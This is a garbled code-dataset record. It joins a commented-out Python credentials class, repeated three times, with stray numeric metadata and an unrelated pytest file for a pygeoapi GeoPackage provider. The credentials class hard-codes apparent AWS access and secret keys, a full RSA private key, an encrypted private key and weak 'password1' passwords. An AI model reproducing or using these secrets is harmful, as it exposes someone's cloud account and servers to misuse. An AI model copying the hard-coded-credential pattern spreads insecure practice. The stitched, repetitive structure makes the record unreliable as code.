# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
# self.pem_private_key = b'-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-256-CBC,6F7135B1FF40772431A52344F2C28F3E\n\n17swNOMYJtX7XSMnL9C6MPmIaI34peR4CPUt0IWaiu5AfuHeGrho2PhaljlKX/Lt\nw4ykD/zrrKk88BrhTTPhArJNOporxC8d2BeyXtiIXqz4+yn256Ox4zfzkAdGq2xq\nRRzNHZot417yqUcIUSI+H39WkHVunhpNWJixMFKp5yhTf1JUHXCNOPNr4M/aALFD\n9U1pJ4t1H0umrNdHKI7lWat5+lnfXPe9GrQ+NYYobM6MX6uM7Mb9ggzN0234rOQM\nhLYdMGUCvXrWUoVHQ7mRR/DBa4S2ptAbyHsQZCOLLvnfQE+lCpT8SxkUf3xyeRGC\njGqHWANEHbdW7LKNS9aSbjoM5fXx9ToJJJiFAo4RuFVpTufVh8zhPscx1DjvVXLQ\nPo1WZrZusELmhzvJOgJQkNvrVnfGmHtB6CuzHUyXAriN1VUekWlNYi3gP5fC5MjO\n+bISUXiGLHi0DYe+x+0PHquI/u5Gugeh/k+q7pvbTnZ/r9so+P4aW2q1IDloFYXv\nDVO3VGdSef3mp1k4B49257K5Vri1XYjLXAkbQyuVFGWphQ4bSHCscZhAevpzCDVk\nPrD0R+egohy/ErZllbp7+rc+VpHMBXpi5LEYAetpdR5URrgZAP5L2WWS4/WtsoAb\nnApoqMuq53QaOjjWx2wTtyU1lOGoT5pSS4/c1UKxV/72Dpbu96e8MBhjwwmIZiGW\nD5fjHJzEDZxtA/YFS1UHxb8hPsMRJkb67dR1fOSDXBWLZdi0MQ1que60bXV4+a8W\nJTKzpf8yOaNkI98QqGcvbfZWcgQ/sMVduOrx1VsndFqXiJ4M5heCAU+3gKAaX9HG\nkoYtTnp+LbshZNawdyW1MtdeeP8zrVfAx+WrYcI8/XL7+tge4n6VkVoqxD6IJX3a\nZ6EPY/J/IBSQsYIeQe4QDrjR1ztbNBS4KMBlJofM3IlPY5ee9L61QBwCW9zM9FNI\n8s54O2D3nGgc5fGteB5Ze4qGDFshPKXJU5uFcSZ19202NhuPTeWkuCFXMSz41eRL\n3kog6OW5q3UNPgMAb9nmuQzDt7fALY9fzl3n6CV/lli68oP8ji8iqqTvP5tjkgQa\nVC5IY97qs0JoeEnORSMo0SdnL/4YK5eni5pZxR1pvdXV0t4Vqap0f2SEi0yL8HxA\nLtmCTYdD9e/IEFcPjoFp/M5NcPUP81S8gJUwLWo9eI2Cpe7tZBrdWHQ6Z8Kc3mQQ\nflT5wXps/H9CmVkDFIu/VuOLxHxVzl7L20a8zkZDRhqnij/IqG+UM27dZ/Rc48Vu\nG7S4um6eahANe7r2n4gDApQBlziUApR5PIeZUFpKELTNKJ4BY1Ttsmt+y3EDU8Uk\nBt38zSYs251WmKjuRwR99dny7p+jjxBdJSW5xpoSv7/DdH9UaF2PhAXetdeYRWnt\nu2lshQzrZBruQpcSCbFS3FvmlNlKc4zoSt9lNp+NgGLZzbLciSQhF5+nyz2k+K26\nZyTbjiaWhK+AfxtgWG84iuJI7DtcuP1MRuud0aV9PZV/KZ8X1AnqDsxCUsUwjtAj\nM5PTCWRL0tSkQKRue8iueN498DdzlK+QqkRGdN3j/YTmh8KZzLvjiUxAUPXByjaV\n-----END RSA PRIVATE KEY-----\n'
# @property
# def credentials_kwargs(self):
# return {
# 'aws_region': data.aws_region,
# 'ssh_key_name': data.ssh_key_name,
# 'cluster_id': data.cluster_id,
# 'instance_id': data.instance_id,
# 'aws_access_key_id': data.aws_access_key_id,
# 'aws_secret_access_key': data.aws_secret_access_key,
# 'customer_ca_key_password': data.customer_ca_key_password,
# 'crypto_officer_password': data.crypto_officer_password,
# 'crypto_user_username': data.crypto_user_username,
# 'crypto_user_password': data.crypto_user_password,
# }
# @property
# def ssh_key_create_resp(self):
# return {
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyMaterial': self.KeyMaterial,
# 'KeyName': self.KeyName,
# 'KeyPairId': self.KeyPairId
# }
# @property
# def ssh_key_describe_resp(self):
# return {
# 'KeyPairs': [
# {
# 'KeyPairId': self.KeyPairId,
# 'KeyFingerprint': self.KeyFingerprint,
# 'KeyName': self.KeyName,
# 'Tags': []
# },
# {
# 'KeyPairId': self.KeyPairId2,
# 'KeyFingerprint': self.KeyFingerprint2,
# 'KeyName': self.KeyName2,
# 'Tags': []
# }
# ]}
# @property
# def ssh_key_kwargs(self):
# return {
# 'id': self.KeyPairId,
# 'name': self.KeyName,
# 'material': self.KeyMaterial,
# 'fingerprint': self.KeyFingerprint
# }
# @property
# def certs_kwargs(self):
# return {
# 'pem_csr': self.pem_csr,
# 'passphrase': self.passphrase
# }
# t = CredentialsData()
| 85.681384
| 1,832
| 0.778137
| 5,069
| 71,801
| 10.85145
| 0.068455
| 0.008944
| 0.008508
| 0.006872
| 0.986183
| 0.986183
| 0.985311
| 0.985311
| 0.985311
| 0.985311
| 0
| 0.110791
| 0.135625
| 71,801
| 837
| 1,833
| 85.783751
| 0.775502
| 0.964109
| 0
| 0.071429
| 0
| 0
| 0.014431
| 0
| 0
| 1
| 0
| 0
| 0.035714
| 1
| 0.107143
| false
| 0
| 0.357143
| 0
| 0.464286
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
07878500726e012b07aa52923469099f8746af6a
| 11,638
|
py
|
Python
|
tests/test_ogr_gpkg_provider.py
|
bradh/pygeoapi
|
d80f80e413235d4c7e263c44fa85318b29326a9c
|
[
"MIT"
] | null | null | null |
tests/test_ogr_gpkg_provider.py
|
bradh/pygeoapi
|
d80f80e413235d4c7e263c44fa85318b29326a9c
|
[
"MIT"
] | null | null | null |
tests/test_ogr_gpkg_provider.py
|
bradh/pygeoapi
|
d80f80e413235d4c7e263c44fa85318b29326a9c
|
[
"MIT"
] | null | null | null |
# Needs to be run like: python3 -m pytest
import logging
import pytest
from pygeoapi.provider.ogr import OGRProvider
LOGGER = logging.getLogger(__name__)
@pytest.fixture()
def config_poi_portugal():
return {
'name': 'OGR',
'data': {
'source_type': 'GPKG',
'source': './tests/data/poi_portugal.gpkg',
'source_srs': 'EPSG:4326',
'target_srs': 'EPSG:4326',
'source_capabilities': {
'paging': True
},
},
'id_field': 'osm_id',
'layer': 'poi_portugal'
}
def test_query(config_poi_portugal):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_poi_portugal)
feature_collection = p.query()
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert features is not None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
def test_get(config_poi_portugal):
p = OGRProvider(config_poi_portugal)
result = p.get(5156778016)
assert result['id'] == 5156778016
assert 'tourist_info' in result['properties']['fclass']
# Testing with GeoPackage files with identical features
# (all 2481 addresses in Otterlo Netherlands)
# in different projections.
@pytest.fixture()
def config_gpkg_4326():
return {
'name': 'OGR',
'data': {
'source_type': 'GPKG',
'source':
'./tests/data/dutch_addresses_4326.gpkg',
'source_srs': 'EPSG:4326',
'target_srs': 'EPSG:4326',
'source_capabilities': {
'paging': True
},
},
'id_field': 'id',
'layer': 'OGRGeoJSON'
}
# Note that this Shapefile is zipped, as OGR supports /vsizip/!
@pytest.fixture()
def config_gpkg_28992():
return {
'name': 'OGR',
'data': {
'source_type': 'GPKG',
'source':
'./tests/data/dutch_addresses_28992.gpkg',
'source_srs': 'EPSG:28992',
'target_srs': 'EPSG:4326',
'source_capabilities': {
'paging': True
},
},
'id_field': 'id',
'layer': 'OGRGeoJSON'
}
def test_get_fields_4326(config_gpkg_4326):
"""Testing field types"""
p = OGRProvider(config_gpkg_4326)
results = p.get_fields()
assert results['straatnaam'] == 'string'
assert results['huisnummer'] == 'string'
def test_get_28992(config_gpkg_28992):
"""Testing query for a specific object"""
p = OGRProvider(config_gpkg_28992)
result = p.get('inspireadressen.1747652')
assert result['id'] == 'inspireadressen.1747652'
assert 'Mosselsepad' in result['properties']['straatnaam']
def test_get_4326(config_gpkg_4326):
"""Testing query for a specific object"""
p = OGRProvider(config_gpkg_4326)
result = p.get('inspireadressen.1747652')
assert result['id'] == 'inspireadressen.1747652'
assert 'Mosselsepad' in result['properties']['straatnaam']
def test_query_hits_28992(config_gpkg_28992):
"""Testing query on entire collection for hits"""
p = OGRProvider(config_gpkg_28992)
feature_collection = p.query(resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
assert hits == 2481
def test_query_hits_4326(config_gpkg_4326):
"""Testing query on entire collection for hits"""
p = OGRProvider(config_gpkg_4326)
feature_collection = p.query(resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
assert hits == 2481
def test_query_bbox_hits_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
# feature_collection = p.query(
# bbox=[120000, 480000, 124000, 487000], resulttype='hits')
feature_collection = p.query(
bbox=[5.763409, 52.060197, 5.769256, 52.061976], resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
print('hits={}'.format(hits))
assert hits == 1
def test_query_bbox_hits_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry, single address"""
p = OGRProvider(config_gpkg_28992)
# feature_collection = p.query(
# bbox=(180800, 452500, 181200, 452700), resulttype='hits')
feature_collection = p.query(
bbox=[5.763409, 52.060197, 5.769256, 52.061976], resulttype='hits')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 0
hits = feature_collection.get('numberMatched', None)
assert hits is not None
print('hits={}'.format(hits))
assert hits == 1
def test_query_bbox_28992(config_gpkg_28992):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_28992)
# feature_collection = p.query(
# bbox=[180800, 452500, 181200, 452700], resulttype='results')
feature_collection = p.query(
bbox=(5.763409, 52.060197, 5.769256, 52.061976), resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 1
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
assert properties['straatnaam'] == 'Planken Wambuisweg'
def test_query_bbox_4326(config_gpkg_4326):
"""Testing query for a valid JSON object with geometry"""
p = OGRProvider(config_gpkg_4326)
# feature_collection = p.query(
# bbox=[180800, 452500, 181200, 452700], resulttype='results')
feature_collection = p.query(
bbox=(5.763409, 52.060197, 5.769256, 52.061976), resulttype='results')
assert feature_collection.get('type', None) == 'FeatureCollection'
features = feature_collection.get('features', None)
assert len(features) == 1
hits = feature_collection.get('numberMatched', None)
assert hits is None
feature = features[0]
properties = feature.get('properties', None)
assert properties is not None
geometry = feature.get('geometry', None)
assert geometry is not None
